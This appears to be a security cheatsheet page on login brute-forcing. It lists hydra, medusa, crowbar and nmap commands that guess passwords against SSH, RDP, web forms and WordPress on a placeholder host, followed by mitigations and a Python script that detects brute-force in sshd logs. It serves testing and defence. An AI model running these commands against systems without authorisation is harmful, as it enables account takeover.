
Login Bruteforce

Brute Force & Cracking cheatsheet — Login brute-force, password cracking, and hashcat/john usage.

Overview

Login brute-force attacks involve systematically attempting to authenticate against a service with many username/password combinations. They target exposed login interfaces such as SSH, RDP, web forms, and VPN portals.

Online brute-force attacks require careful management of timing and concurrency to avoid lockout policies and detection.

Category: Brute Force & Cracking

Key Commands & Payloads

The following commands and payloads are commonly used when testing a login interface for brute-force weaknesses:

hydra -l admin -P rockyou.txt ssh://10.10.10.10
hydra -L users.txt -P rockyou.txt rdp://10.10.10.10
hydra -l admin -P rockyou.txt -t 64 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
medusa -U users.txt -P rockyou.txt -h 10.10.10.10 -M ssh
crowbar -b rdp -s 10.10.10.10/32 -u admin -C rockyou.txt
nmap --script http-wordpress-brute -p 80 --script-args 'userdb=users.txt,passdb=rockyou.txt' 10.10.10.10

Tools & Techniques

Recommended tools for Login Bruteforce:

  • Hydra: multi-protocol parallel login brute-forcer
  • Medusa: modular parallel brute-force tool
  • Crowbar: brute-force tool for RDP, SSH, VNC
  • Nmap NSE scripts: protocol-specific brute-force
  • Patator: flexible multi-protocol brute-forcer
  • CeWL: custom wordlist generator from target website

Prevention & Mitigation

Security recommendations to prevent Login Bruteforce:

  • Implement account lockout after 3-5 failed attempts
  • Use rate limiting and CAPTCHA on login pages
  • Require multi-factor authentication
  • Use strong, unique passwords for all services
  • Monitor and alert on multiple failed login attempts
  • Implement IP-based blocking after threshold failures
  • Use Web Application Firewall (WAF) to block brute-force traffic
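One way to act on the "monitor and alert on multiple failed login attempts" item above, as an added example that is not part of the original cheatsheet: parse syslog-style sshd "Failed password" lines and flag any source IP that reaches a failure threshold inside a sliding time window. The log lines, hostname and addresses are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd log lines (not from any real host): one source makes
# many failures in a short window, the other is a single benign typo.
SAMPLE_LOG = """\
Mar 12 10:00:01 host sshd[2101]: Failed password for invalid user test from 203.0.113.7 port 50210 ssh2
Mar 12 10:00:02 host sshd[2102]: Failed password for root from 203.0.113.7 port 50211 ssh2
Mar 12 10:00:03 host sshd[2103]: Failed password for admin from 203.0.113.7 port 50212 ssh2
Mar 12 10:00:04 host sshd[2104]: Failed password for invalid user oracle from 203.0.113.7 port 50213 ssh2
Mar 12 10:00:05 host sshd[2105]: Failed password for admin from 203.0.113.7 port 50214 ssh2
Mar 12 10:00:06 host sshd[2106]: Failed password for admin from 203.0.113.7 port 50215 ssh2
Mar 12 10:03:30 host sshd[2107]: Failed password for alice from 198.51.100.4 port 41000 ssh2
Mar 12 10:03:35 host sshd[2108]: Accepted password for alice from 198.51.100.4 port 41001 ssh2
"""

# Matches syslog-style sshd failure lines, with or without "invalid user".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_failures(log_text, year=2024):
    """Yield (timestamp, user, source_ip) for every failed sshd login.
    Syslog lines carry no year, so one is assumed."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=2)):
    """Return {ip: {"failures": n, "users": [...]}} for every source IP that
    reaches `threshold` failures inside any sliding `window`."""
    events = defaultdict(list)
    for ts, user, ip in parse_failures(log_text):
        events[ip].append((ts, user))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1  # drop events that fell out of the window
            if end - start + 1 >= threshold:
                alerts[ip] = {"failures": len(evs),
                              "users": sorted({u for _, u in evs})}
                break
    return alerts
```

Keying the window on source IP catches a single-host attack like the hydra and medusa runs above; a distributed password spray from many addresses needs a second counter keyed on the target account.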

References

Additional resources: